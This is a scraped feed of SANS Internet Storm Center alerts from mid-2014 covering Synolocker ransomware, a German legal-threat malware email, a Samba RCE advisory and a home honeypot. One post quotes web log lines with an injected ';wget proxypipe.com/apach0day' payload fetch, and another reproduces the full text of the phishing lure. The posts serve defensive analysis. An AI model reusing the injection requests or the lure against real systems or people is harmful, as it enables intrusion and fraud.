Alerts

Center for Internet Security Releases Benchmark for VMWare ESXi 5.5 https://benchmarks.cisecurity.org/downloads/form/index.cfm?download=esxi55.100, (Tue, Aug 5th)

Latest Alerts - Tue, 08/05/2014 - 05:22

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Synolocker: Why OFFLINE Backups are important, (Tue, Aug 5th)

Latest Alerts - Tue, 08/05/2014 - 05:15

One current threat causing a lot of sleepless nights to victims is "Cryptolocker" like malware. Various variations of this type of malware are still haunting small businesses and home users by encrypting files and asking for ransom to obtain the decryption key. Your best defense against this type of malware is a good backup. Shadow volume copies may help, but aren't always available and complete.

In particular for small businesses, various simple NAS systems have become popular over the recent years. Different manufacturers offer a set of Linux based devices that are essentially "plug and play" and offer high performance RAID protected storage that is easily shared on the network. One of these vendors, Synology, has recently been somewhat in the cross hairs of many attacks we have seen. In particular vulnerabilities int he web based admin interface of the device have led to numerous exploits we have discussed before. 

The most recent manifestation of this is "Synolocker", malware that infects Synology disk storage devices and encrypts all files, similar to the original cryptolocker. Submissions to the Synology support forum describe some of the results [1].

The malware will also replace the admin console index web page with a ransom message, notifying the user of the exploit. It appears however that this is done before the encryption finishes. Some users where lucky to notice the message in time and were able to save some files from encryption.

It appears that the best way to deal with this malware if found is to immediatly shut down the system and remove all drives. Then reinstall the latest firmware (may require a sacrificial drive to be inserted into the system) before re-inserting the partially encrypted drives.

To protect your disk station from infection, your best bet is:

  • Do not expose it to the internet, in particular the web admin interface on port 5000
  • use strong passwords for the admin functions
  • keep your system up to date
  • keep offline backups. this could be accomplished with a second disk station that is only turned on to receive the backups. Maybe best to have two disk stations from different manufacturers.

It is important to note that while Synology has been hit the hardest with these exploits, other devices from other manufacturers had vulnerabilities as well and the same security advice applies (but typically, they listen on ports other then 5000). 

[1] http://forum.synology.com/enu/viewtopic.php?f=3&t=88716

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Legal Threat Spam: Sometimes it Gets Personal, (Tue, Aug 5th)

Latest Alerts - Tue, 08/05/2014 - 04:57

Yesterday, I spotted the following tweet mentioning me:

Needless to say, I got intrigued, and luckily the sender of the tweet was willing to share a sample.

The sample turned out to be simple legal threat malware e-mail written in German. The e-mail claimed that the recipient downloaded a copyrighted movie and it asked for legal fees. The invoice for the legal fees was supposed to be included in the attached ".cab" file.

From: "Johannes Ullrich"  
To: [removed].de
Subject: [vorfall:132413123]

Guten Tag,

Am 01.08.2014 wurde von Ihrem Rechner mit der IP-Addresse 192.0.2.1 um 12:13:01 der Film "Need for Speed" geladen. Nach §19a UrhG ist dies eine kriminelle Handlung. Unsere Anwaltskanzlei  muss dies ans zuständige Amtsgericht melden, außer Sie Zahlen ein außergerichtliches Strafgeld in Höhe von 436.43 Euro an uns.
Die Rechnung "1234.cab" entnehmen Sie dem Anhang.

Hochachtungsvoll,
Johannes Ullrich
+4991312341234

The attached .cab file runs a typical trojan downloader that could download various pieces of malware. A quick search shows a number of other reports of this email, with different "From:" names. It looks like it picks plausible German names, maybe from the contact list of infected systems. My names isn't that terrible unusual, so I don't think this is targeted at all. Sometimes it is just an odd coincidence, and they aren't really after you.

In the case above, the "From" e-mail address is not related to me. However, if an attacker sends spam using your e-mail address, it is very useful to have DMARC configured for your domain. With DMARC, you give the receiving mail server the option to report any e-mail that fails the DKIM or SPF tests to you. Only a few mail servers do so, but some of them are major public web mail systems. For example, here a quick report I just received for a domain I own:


(click on image for full size)

The attachment does include a report with details why the e-mail was found to be suspect (of course, you should still be careful with attachments. These reports can be faked too!) ;-).

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, August 5th 2014 http://isc.sans.edu/podcastdetail.html?id=4091, (Tue, Aug 5th)

Latest Alerts - Mon, 08/04/2014 - 17:23
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Threats & Indicators: A Security Intelligence Lifecycle , (Mon, Aug 4th)

Latest Alerts - Sun, 08/03/2014 - 17:06

In our recent three-part series, Keeping the RATs Out (Part 1, Part 2, Part 3), I tried to provide analysis offering you an end-to-end scenario wherein we utilized more than one tool to solve a problem. I believe this to be very useful particularly when making use of threat intelligence. Following is a partial excerpt from my toolsmith column, found monthly in the ISSA Journal, wherein I built on the theme set in the RATs series. I'm hopeful Threats & Indicators: A Security Intelligence Lifecycle helps you build or expand your threat intelligence practice.

I receive and review an endless stream of threat intelligence from a variety of sources. What gets tricky is recognizing what might be useful and relevant to your organizations and constituencies. To that end I’ll take one piece of recently received intel and work it through an entire lifecycle. This intel came in the form of an email advisory via the Cyber Intelligence Network (CIN) and needs to remain unattributed. The details, to be discussed below, included malicious email information, hyperlinks, redirects, URL shorteners, ZIP archives, malware, command and control server (C2) IPs and domain names, as well as additional destination IPs and malicious files. That’s a lot of information but sharing it in standards-based, uniform formats has never been easier. Herein is the crux of our focus for this month. We’ll use Mandiant’s IOCe to create an initial OpenIOC definition, Mitre’s OpenIOC to STIX, a Python utility to convert OpenIOC to STIX, STIXviz to visualize STIX results, and STIX to HTML, an XSLT stylesheet that transforms STIX XML documents into human-readable HTML. Sounds like a lot, but you’ll be pleasantly surprised how bang-bang the process really is. IOC represents Indicators Of Compromise (in case you just finally just turned off your vendor buzzword mute button) and STIX stands for Structured Threat Information eXpression. STIX, per Mitre, is a “collaborative community-driven effort to define and develop a standardized language to represent structured cyber threat information.” It’s well worth reading the STIX use cases. You may recall that Microsoft recently revealed the Interflow project which incorporates STIX, TAXII (Trusted Automated eXchange of Indicator Information), and CybOX (Cyber Observable eXpression standards) to provide “an automated machine-readable feed of threat and security information that can be shared across industries and community groups in near real-time.“ Interflow is still in private preview but STIX, OpenIOC, and all these tools are freely and immediately available to help you exchange threat intelligence...   Keep reading Threats & Indicators: A Security Intelligence Lifecycle here.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, August 4th 2014 http://isc.sans.edu/podcastdetail.html?id=4089, (Mon, Aug 4th)

Latest Alerts - Sun, 08/03/2014 - 16:36
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon, (Sat, Aug 2nd)

Latest Alerts - Fri, 08/01/2014 - 16:46

A remote code execution in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10. ( assgined CVE-2014-3560) and a patch has been release by the team at samba.org.

Here's the details from http://www.samba.org/samba/security/CVE-2014-3560

=========== Description =========== All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon. A malicious browser can send packets that may overwrite the heap ofthe target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root).   ================== Patch Availability ================== A patch addressing this defect has been posted to http://www.samba.org/samba/security/ Additionally, Samba 4.1.11 and 4.0.21 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible. ========== Workaround ========== Do not run nmbd, the NetBIOS name services daemon.

 

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft's Enhanced Mitigation Experience Toolkit 5.0 is out: http://www.microsoft.com/en-us/download/details.aspx?id=43714, (Fri, Aug 1st)

Latest Alerts - Thu, 07/31/2014 - 23:00

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, August 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4087, (Fri, Aug 1st)

Latest Alerts - Thu, 07/31/2014 - 17:41
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

WireShark 1.10.9 and 1.12.0 has been released, (Fri, Aug 1st)

Latest Alerts - Thu, 07/31/2014 - 17:18

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

A Honeypot for home: Raspberry Pi, (Thu, Jul 31st)

Latest Alerts - Thu, 07/31/2014 - 06:20

In numerous previous Diaries, my fellow Internet Storm Center Handlers have talk on honeypots, the values of full packet capture and value of sharing any attack data. In this Diary I'm going to highlight a fairly simple and cost effective way of rolling those together. 

If you have an always on internet connection, having a honeypot listening to what is being sent your way is never bad idea. There's plenty of ways to set up a honeypot, but a inexpensive way is to set up one up at home is with a Raspberry Pi [1]. The Raspberry Pi is a credit-card sized computer, which can be hidden away out of sight easily, has a very low power consumption and is silent but works very well for a home honeypot.  

These are plenty of install guides to install the OS (I like using Raspbian), secure it then, drop your pick, or mix, of honeypot such as Kippo [2], Glastopf [3] or Dionaea [4] on it. Again, guides on how to set these up litter the intertubes, so take your pick. As additional step, I like to install tcpdump and plug in a Linux formatted 4Gb USB drive in to the Pi and then do full packet capture of any traffic that is directed to the Pi's interface to the USB drive. Other than who doesn't like to sifted through packet captures during downtime, there are times capturing the full stream provides insights and additional options (like running it through your IDS of choice) on the connections being made to you.

Once you have it all set up, secured, tested and running don't forget to share the data with us, especially if you install Kippo [5]

From my observations, don't expect a massive amount of interaction with your home honeypot, but you will see plenty of scanning activity. It's a fairly interesting insight, especially if you pick a number of ports to forward on from your router/modem for the honeypot to listen on. If you do set up tcpdump to capture any traffic hitting the Raspberry Pi network interface (and haven't set up a firewall to drop all non-specified traffic) is that it'll pick up any chatty, confused or possibly malicious connections within your home network if they are broadcasting or scanning the subnet as well. With the Internet of Things being plugged in to home networks now, it's always handy to have a little bit of notification if your fridge starts port scanning every device on your network...

As one of my fellow Handler, Mark Hofman, sagely mentioned:

"if you are going to set one up, make sure you fully understand what you are about to do.  You are placing a deliberately vulnerable device on the internet.  Depending on your location you may be held liable for stuff that happens (IANAL).  It it gets compromised, make sure it is somewhere where it can't hurt you or others."

So keep an eye on your Pi!

Happy honeypotting!

 

[1] http://www.raspberrypi.org/
[2] https://github.com/desaster/kippo
[3] http://glastopf.org/
[4] http://dionaea.carnivore.it/
[5] https://isc.sans.edu/diary/New+Feature%3A+%22Live%22+SSH+Brute+Force+Logs+and+New+Kippo+Client/18433

 

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, July 31st 2014 http://isc.sans.edu/podcastdetail.html?id=4085, (Thu, Jul 31st)

Latest Alerts - Wed, 07/30/2014 - 17:58
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Symantec Endpoint Protection Privilege Escalation Zero Day, (Wed, Jul 30th)

Latest Alerts - Wed, 07/30/2014 - 14:37

The people at Offensive Security have announced that in the course of a penetration test for one of their customers they have found several vulnerabilities in the Symantec Endpoint Protection product. While details are limited, the vulnerabilities appear to permit privilege escalation to the SYSTEM user which would give virtually unimpeded access to the system.  Offensive Security has posted a video showing the exploitation of one of the vulnerabilities.

Symantec has indicated they are aware of the vulnerabilities and are investigating.

There is some irony in the fact that there are Zero Day vulnerabilities in the software that a large portion of users count on to protect their computer from malware and software vulnerabilities. The fact is that software development is hard and even security software is not immune from exploitable vulnerabilities. If there is a bright side, it appears that there are no exploits in the wild yet and that local access to the machine is required to exploit these vulnerabilities.

-- Rick Wanner - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, July 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4083, (Wed, Jul 30th)

Latest Alerts - Tue, 07/29/2014 - 19:20
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, July 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4083, (Wed, Jul 30th)

Latest Alerts - Tue, 07/29/2014 - 19:20
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, July 29th 2014 http://isc.sans.edu/podcastdetail.html?id=4081, (Tue, Jul 29th)

Latest Alerts - Mon, 07/28/2014 - 17:30
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th)

Latest Alerts - Mon, 07/28/2014 - 15:19

Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day" 

There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079, (Mon, Jul 28th)

Latest Alerts - Sun, 07/27/2014 - 19:07
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Management and Control of Mobile Device Security, (Mon, Jul 28th)

Latest Alerts - Sun, 07/27/2014 - 17:14

When we talk about mobile devices, all boundaries are gone. Depending where you work, it is likely that your mobile device (phone or tablet) has access to all the corporate data via wireless, in some case with very little restrictions.

Two points to take in consideration:

- Defining access control: Create one access policy that is applied and control all networks (wireless, VPN, wired)
- Use Mobile Device Management (MDM): Provide the ability to separate data from personal and company-owned assets with approved security controls for any devices whether they are company owned or personal.

These changes should provide greater network visibility allowing your organization to discover devices, measure bandwidth utilization, enforce policies, analyze traffic patterns to monitor for anomalous activity that can drain resources.

We would like to hear from you, what is your organization currently doing to manage mobile devices in your network?

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

"Internet scanning project" scans, (Sat, Jul 26th)

Latest Alerts - Fri, 07/25/2014 - 17:05

A reader, Greg, wrote in with a query on another internet scanning project. He checked out the IP address and it lead to a web site, www[.]internetscanningproject.org, which states:


"Hello! You've reached the Internet Scanning Project.

We're computer security researchers performing periodic Internet-wide health assessments.

If you reached this site because of activity you observed on your network:

We apologize for any concern caused by our network activity. We are not specifically targeting your network.

We have not attempted to unlawfully access or abuse your network in any way. We are exclusively accessing publicly available servers, we respect all authentication barriers, and (as you can see) we have made no attempt to hide our activity.

This effort is part of a research project in which we are engaged in with view to possibly contributing to public Internet health datasets. We believe research of this sort is both legal and beneficial to the security of the Internet as a whole.

However, if you wish to be excluded from our scanning efforts after reading the clarifying information below, please email us with IP addresses or CIDR blocks to be added to our blacklist."

It does not provide any information or assurances that this is a legitimate research project and I wouldn't be want to sending information to unknown people via an unattributable web site. The normal low level open source searching doesn't reveal anything of use or attribution either. It does, however, bring up a fair number hits of people asking what are these scans and the best way to block them.

It appears this scanning has been running for a couple of weeks and has being using multiple IP addresses (see https://isc.sans.edu/topips.txt for some examples). A curious point, for a "legitimate" scan, is that they have started changed the User Agent frequently and in some cases to some very odd nonsensical strings. The core scans are against TCP ports 21, 22 and 443 and the 443 scans may trigger alerts for probing on the Heartbleed bug.

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts
Syndicate content